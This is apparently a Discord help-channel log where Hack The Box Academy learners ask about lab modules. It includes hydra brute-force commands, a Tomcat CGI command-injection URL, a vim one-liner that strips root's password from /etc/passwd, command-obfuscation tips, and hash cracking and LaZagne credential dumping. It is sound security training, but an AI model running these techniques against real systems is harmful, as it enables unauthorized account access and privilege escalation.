hi im doing the login brute forcing module atm but im stuck on the skill assessment - website question 2. "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?" I think im doing everything right and when i google it looks like it but it takes sooo long. Do i need to wait that long? i did
sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 178.35.49.134 -s 32901 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

Look at the names of the HTML elements again.

ehh what do you mean?

@acoustic owl

I do not know what you have tried, but ||GetUserSPNs.py|| is your friend

Look at the source code of the website and then check the names of the HTML elements you use.

sorry im new to this, but i already know the username and everywhere i look it says that i should do bruteforce with rockyou.txt but it says its gonna take hours to complete

and i have never sued getuserpns.py

@acoustic owl

Think about what hydra does exactly.
Then look at your command again and consider whether Hydra can be successful with it at all.

That was addressed to Kai, not to you

and one more tip.
Do not try to look for solutions in forums or elsewhere. Look for the solution yourself.
Partly ways, which are described in the forums are not correct. On the other hand, you do not learn the necessary knowledge.
If you are stuck and need help, then ask in the forum or here on Discord explicitly. Then you will certainly get an answer, which leads you in the right direction.

yea I usually dont search up the answers bc i wanna learn but I have been stuck for so long and i cant understand whats wrong with it

you mind pointing me in the right direction? @acoustic owl

I told you to check the names of the HTML elements. The names of the HTML elements you want to address are wrong.

Look at the source code of the website and find out what the HTML elements are really named and then change your command.

Anyone working on the Game Reversing & Modding Skill Assesment ?

i tried with sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 94.237.59.206 -s 58786 http-post-form "/admin_login.php.:username=user&password=^PASS^:F=<form name='login'"

the name of the HTML Elemets are wrong.
you do not need sudo here

Im sorry but I cant see what wrong with it. I have tried every possible solution and I have been going trough the module all over again and I cant see it

use double [[if...]]

Check the Name of the HTML Elements (Like form fields, etc)

Think about what exactly hydra does and what exactly hydra needs to do it.

What part us tge HTML Elements? This part? "/admin_login.php.:username=user&password=^PASS^:F=<form name='login'"

Yes, the names are wrong.

didn't get that much help

still not getting right ans

Check again in the module what exactly an If statement must look like and then check the code again.

Also check your code again with the code from the module.
Delete your script, then paste the script from the module and add ONLY your If statement. Don't touch anything else.

Here you can find the code:
https://academy.hackthebox.com/module/21/section/129

so my initial code was giving me the ans but it was wrong but now i though it could be +1 or -1 of the output and as soon as i inputed +1 my ans become right

now i am thinking hard what i could do to get the right ans witout increase it manually

and by thinking for few min i think culprit was echo -n

without -n i got the right ans

🙂

thx for ur help

Is Information Gathering - Web Edition, "vHosts" section broken?

I'm tasked to find 4 flags on 4 subdomains. I find them, but two flags are identical and obviously only work for one answer

Also one question says Enumerate the target and find a vHost that contains flag No. 3 but the flag that works for this question starts with something along the lines of HTB{flag_four_...

(coincidentally the question mentioning a "flag No. 4" is the one I can't submit an answer for, with the 4th subdomain I found)

maybe there's a 5th flag that works for the 4th flag question........ KEKW

no

i got all the flags

can I DM you to confirm pls?

sure

hydra -l user -P /usr/share/wordlists/rockyou.txt -f 94.237.62.195 -s 37272 http-post-form “/admin_login.php:username=^USER^&paswords=^PASS^:F=<form name=’login’” I got to this point but now i get error instead

Look at the source code. The names are wrong.

I Did this now and succeded sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'"

but i do not get forward when i type username and password on the admin page

Yes, because the names of the HTML elements is still wrong. So Hydra gives you false positives.

Can you please show me whats wrong with this @acoustic owl

i have been sitting with one question all day I cant see whats wrong

The names of the HTML elements are wrong.
HTML elements are things like form fields, etc.

https://www.w3schools.com/html/html_forms.asp

I get that something is wrong here "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'" but I dont see whats wrong

i checked the link but I still dont see it

Have a look at the source code and then search for password

Think about how hydra works and what hydra does exactly. Then think about which things you pass on to hydra...

ㅎ

Hi I know I'm bit stupid here but don't know what's going on in this module. I url encoded the payload and executing it but the payload is not getting executed. I'm in "Attacking Tomcat CGI" module.

Payload I used "http://IP:8080/cgi/welcome.bat?&c%3A\windows\system32\whoami.exe"

Maybe Burp can also help you see what exactly is wrong.
Intercept a login request with Burp.

sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='login'" okey i saw in burp that is was user and pass instead

There is one more HTML element name that is also wrong. Look in the source code of the website.

and use sudo only when it is really needed

sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='admin_login'" tried this now but still getting wrong passwords

Why do you use sudo?

An HTML element is still wrong.

Okey no more sudo but I have been reading through the whole module and I cant find the answer for whats wrong

Because the module does not give you 1:1 instructions that you can simply copy.
You need to understand what hydra does exactly.
Then look at your command and look at the source code of the website, then you know what you need to change.

Finally yea I see the problem now forgot the -

but now i got it atleast

thank for the help

whats the best books for hacking for beginners

hello there I'm actually on the AD Administration: Guided Lab Part II.
After aplying with this command

Add-Computer -ComputerName ACADEMY-IAD-W10 -LocalCredential ACADEMY-IAD-W10\image -DomainName INLANEFREIGHT.LOCAL -Credential INLANEFREIGHT\htb-student_adm -Restart

I try to Check OU Membership of a Host with the command :

Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties * | select CN,CanonicalName,IPv4Address

But got the error message :

Get-ADComputer : The server has rejected the client credentials.
At line:1 char:1
+ Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (INLANEFREIGHT\htb-student_adm:ADComputer) [Get-ADComputer], Authenticati
   onException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.A
   ctiveDirectory.Management.Commands.GetADComputer

Can anyone explain to me what I am doing wrong?

For question 3 of this link(https://academy.hackthebox.com/module/112/section/1069) the question being "What is the IPv4 address of the hostname DC1? " I tried typing 'nslookup DC1' and this is the result I got.

What am I doing wrong?

You are asking the wrong DNS resolver.
How is Cloudflare Resolver supposed to know what you mean by DC01?

So how do I figure out what DNS resolver to ask for

think about which DNS server here might know the answer

Would I have to determine what DNS authoritative server the hostname "DC1" is part of

is there something wrong with HTB today? my box always seems to die after a set amount of time

So would any of these two servers be associated with the hostname DC1

No

the first is from Cloudflare
the second one is from google

So would I use a local dns authoritative server, not Cloudflare or google

What is needed for running an Active Directory?

Domain controller?

Yes, and?

DNS server?

Ask this server

I am not sure how to ask dns server anything given that when I asked chat gpt this question , they return these suggestions that I previously tried but it failed for me

You can query a specific server like this:
nslookup example.com 10.10.10.10

or with dig
dig example.com @10.10.10.10

Should I not replace example.com with hostname DC1

yes of course 🙂

For the last question in the module https://academy.hackthebox.com/module/18/section/80, I'm not getting curl response for curl https://www.inlanefreight.com >htb.txt what am I doing wrong ? need help 🙂

Hi, I'm at password attacks hard module, I found ||johanna credentials and I'm trying with hashcat to decrypt keepass login|| but I can't it's spending a lot of time without finding the key, any hits? thanks

Good morning everyone! I am getting an error when trying to run ssh2john to crack a ssh key. How do I call python 2 to run when trying to run ssh2john instead of python3? Thank you for your help!

python2 code to run.py

So would it be python2 ssh2john.py?

first did you run cmd as administrator? also you can tru tools like cme for this

Yes sir

if you are on the pwnbox try python2.7 /usr/share/john/ssh2john.py

hint use the mutated wordlist

TY!

hello

ima newbie

i want to learn to hack

how do i do so?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

anyone ?

best thing i can give you about that without directly giving you the answer is google

i've find ||Candidates.#1....: Victoria2020 -> Yellow99!||

don't work

of course don't use those

after hashcat is done add --show in the end of your hashcat command run it again

not work

then hashcat probably didn't crack the hash

what wordlist did you use?

Anyone know why I'm not able to connect? It's the first lesson of the windows module.

The code is the same that they use in the example, but I get certificate errors instead of a remote windows unit

try /cert:ignore

that would go after the initial line?

at the end yes

but is the given password Password?

It would appear so yes

maybe I'll try to password they used for themselves in their video example, that eliminated the cert issue now it's a logon issue

So I tried using the python2.7 /usr/share/john/ssh2john.py but I am getting a permission denied.. Any ouput I put it denies me. I have never felt so dumb

first there is no video on the academy and what module and section are you in?

send me a screenshot of that hashcat command but with the --show at the end

||hashcat -m 13400 -a 0 hashjohannakeepass mut_password.list -S||

nothing don't working

i mean a screenshot of what happen when you run it

This is the instructions given, however the above video example in the module used a password that ended up working for me. Maybe we should update the written password from Password, it seems like a pretty straight forward instruction.

this is the example I'm referring to

which module and section are you on? also all example are placeholder so don't directly use the whole example command without changing anything

I used our target IP, This is introduction to windows as a part of cyber security fundamentals

lesson 1

the windows fundamentals module?

no idea what's the issue this part is straightforward but shoot me a dm with that hash

Yes, module 1 Windows Fundamentals

under the Questions part it's clearly started that RDP to with user "htb-student" and password "Academy_WinFun!"

Okay, I see that now, I still don't understand why you would give a direct connecting command to use arbitrarily

also you may want to do the intro to academy module because you are on the module Windows Fundamentals and Introduction to Windows section there is no number for the academy modules

This is my 4th module within my current path

I've already done the intro to academy, it's the first path everyone has to take

I just finished intro to linux.

I can't remove the ||x ||for root in this section - https://academy.hackthebox.com/module/51/section/1844 using ||/usr/bin/vim.basic /etc/passwd ||and editing or the command provided ||echo -e ':%s/^root:[^:]*:/root::/\nwq' | /usr/bin/vim.basic -es /etc/passwd||. The capabilities are these per enumeration in the screenshot. Can someone help me with what i'm missing?

try with ! so nwq!

ty

Why did this work? Shouldn't I have been able to edit the file manually also?

for why that work i got no idea that's what i have in my note lol and yes you should be able to do this manually

oh wait it's vim so wq is for write + quit but i always use wq! to exit vim

oh I see

I barely use vim. I'm a nano fan. Probably should learn it more

i mean vim have multiple article about how to exit it 🤣

true that. Upon manually making the change it wouldn't let me save and exit though

anyone done command injections module?

???

Any help with Footprinting medium? I don't understand, even after connecting the the MSSQL server and opening every single table and folder in that DB, there is no relevant information regarding the user HTB, what am I supposed be looking for?

there is

hello y'all, I'm having this issue with Msf::OptionValidateError The following options failed to validate: SESSION

i need help with advanced command obfuscation

Reading the hint and your reassurance helped me get it, thank you

https://academy.hackthebox.com/module/109/section/1039

what I'm trying to set an autorute in MSF, I replicate the commands explained in the module

googling I couldn't find something useful, any idea what I'm missing or doing wrongly?

What is not working?

find command is incompatible with tail

it keeps saying find -n: unknown predicate

^

find and tail have nothing to do with each other either.
https://www.man7.org/linux/man-pages/man1/find.1.html

oh i forgot to mention its inside a subshell $()

try to use find and tail -n with $() , find keeps taking -n as its argument rather than tail

how can i post a screen shot

read and follow #welcome

find does not know option -n

exactly

but it tries to get and that gives error

read the man page which I have linked above

this

You do not pass tail a text file

i need to use tail on output of find

to be exact this is what i need to do

You can try something like cat mytextfile.txt | tail -n 1

they use subshells for these bypassing but i cant use that for some reason

Find the output of the following command using one of the techniques you learned in this section:

the other technuques are similar only they all use subshells

one reverses the command and another changes case of command but they both use subshells to execute

without tail it worked and it showed a load of output

i then tried to manually scroll down and get to last one but it was not accepted as right answer

The module shows you how to obfuscate a command. Use this technique

use tail -n 1 < <(find .)

how to use it inside a subshell

Read the module again. Everything is really explained.

Use a modul-figurant at the end of the ESC tablet

The command already specifies in the question. You only have to modify/obfuscate it so that you can submit it.

The compressor uses L-lite modullars for the screen to twist

tail -n 1 < <(find .) )

now it’s in a sub shell

¯_(ツ)_/¯

The command is given in the question 😉

https://cdn.discordapp.com/attachments/774040263278592041/1152659571664494702/image.png

Use the command as in the question.

What you do now is to query your own machine 😉

wdym, the commands are filtered i need to obfuscate them

but then to decode and run them i need to use subshell

but then find and tail are hating each other

The section shows how you can do this. Read the section again.

It¨s a command liner that's systematicly doing this

(tail -n 1 < <(find /usr/share/ |grep root | grep mysql | base64) | base64 -d

idk tho i haven’t done that module before

i could bypass commands by adding quotes but i cannot bypass pipe without using subshells right

No
This is the command
find /usr/share/ | grep root | grep mysql | tail -n 1

😉

tailness

can you please tell the answer, i've been trying this for like 6 hrs continuosly now

can i get a hint atleast, like without subshell how is it even possible

even the machine reset like 4 times :(

https://academy.hackthebox.com/module/109/section/1039
It is described here....
You need a subshell, but not in the command itself

shit i finally finished it i used ||eval|| is that what you were hinting

The cyber network files are not in the Linux, linus, grants of the debugger granting it

No, I didn't mean ||eval|| either
You can use the command exactly as in the question.
You just have to obfuscate it as described in the module.

Read the Chapter ||Encoded Commands|| again

Good afternoon! Excuse me for bothering the community on such a simple issue. Who was able to answer the question: "Bloodhound - Skill Assessment," B: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Enter a number as the answer (up to two decimal places, i.e. 11.78).

Hey all, I'm doing "Initial Enumeration of the Domain"

so i launch wireshark in pwnbox and i'm gettting this error message

nvm i got it to work

In the cheatsheet linked, there is a version without Azure.
You can then take this query and adapt it accordingly so that it works for Azure

Module: CROSS-SITE SCRIPTING (XSS) - Session Hijacking
From my vm and from pwnbox I can't connect to the server.
I tried the url with http, but it automatically set it back to https.
To get a connection I changed the server. Generated new files for openvpn and tried to use the pwnbox. With pwnbox I had temporaly a connection. What can I do now?

anyone did the password hardlab

i want to ask him

What do you want to ask him?

About how you can get the file without the smb

Using the nfs ?

anyone can help me with attacking common services module, in the Attacking smb?

i'm trying to brute force user jason, but it's not working

Why not using smb?

What did you try?

this

Is this the list from the module?
Try another tool

yes

i tryed too msfconsole

buts not working too

Did you rename the list?

yeah

i restart the lab and i got it

thanks man

im facing an error

smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT im getting this error since the morning

noe its 2 days and i cannot get it

#Module: DACL Attacks I
#Section: DACLs Overview
#Sub-section: Local Kernel Debugging

It briefly glosses over using windbg and local kernel debugging, yet I have absolutely no clue how to use either. Searching "windbg" in HTB Academy only turns up the DACL Attack module. Can anyone point me in the right direction here?

try mget *

maybe try it with PwnBox

It is only touched upon very briefly.
After that, there is a link to Microsoft. There is nothing more and it is not needed to finish the module.

https://academy.hackthebox.com/module/147/section/1320

Can anybody provide some sort of hint? I m on the Credential Hunting in Linux section for the Password Attacks module. I made it into the target machine, I searched multiple hackthebox forum topics.

I can't scp the shadow.bak to my machine so I can unshadow

Look at the section again.
It shows how you can find interesting things.

https://tenor.com/view/lasagna-garfield-pasta-yummy-delicious-gif-17886507

I tried LaZagne,

lol

I get an error

You have to upload the whole zip file.

thanks for the tip

oh for real?

@acoustic owl Very well. Thank you.

I'm sorry if this is off topic but I just joined the server and I have some problems

wait the exe, standalone?

Can someone help pls?

yeah sure go ahead

So I opened a htb account on my laptop but the email was the wrong one so now it keeps me at verify your email page and won't let me sign in with my other account

u can reach the support for this question

Idk where

Sorry

exe? on Linux? No…

I managed to get the zip over, thanks. Now I am getting a python error

I guess Ill keep trying idk

python is not even installed on the target machine though?

this is crazy

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

it is installed…

you are logged in with kira, right?

yes

I tried python --version but nothing shows up

also:

try python3

omg for real??

python3 --version is different than python --version??

omg @acoustic owl you know what I did

thanks for helping me by the way

when I was trying the python command, i didn't capitalize the Z in lazagne so it said no file

Im sorry, i am literally at my wit's end when I come in here

Thank you very much

Sometimes the tab key helps 😉

You know how many rabbit holes I went down just for that? I can't imagine the real boxes. I tried cracking a zip, firefox_decrpyt, unshadowing..

https://tenor.com/view/rabbit-peek-serious-carrot-the-gif-24686398

any advice please ?

Hi there
Sorry to bother you
Is there any ethical hacker? I need some help

this is not the server for that

read the #rules this channel is for HTB academy modules

by Guided Lab Part II you mean the skill assessment II right? if yes then hint you can't add a computer also there is no user with the username of htb-student_adm

It's the Introduction to AD module

After the restart, RDP to the target with htb-student_adm user instead of image

It's because image is a local account that you just use to setup and not a domain account, so you don't have rights to get info about the domain I think

If you still login as image you can also just specify the credentials again
Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties * -Credential INLANEFREIGHT\htb-student_adm | select CN,CanonicalName,IPv4Address

can i ask

what a rabbit hole

When you think you’re getting somewhere but it leads to nothing

So you dive in with full confidence, but in actuality it’s a waste of time

in see thankj you

the get and mget bouth are not working on my attack box same probleme timeoput but on the pwn box its is working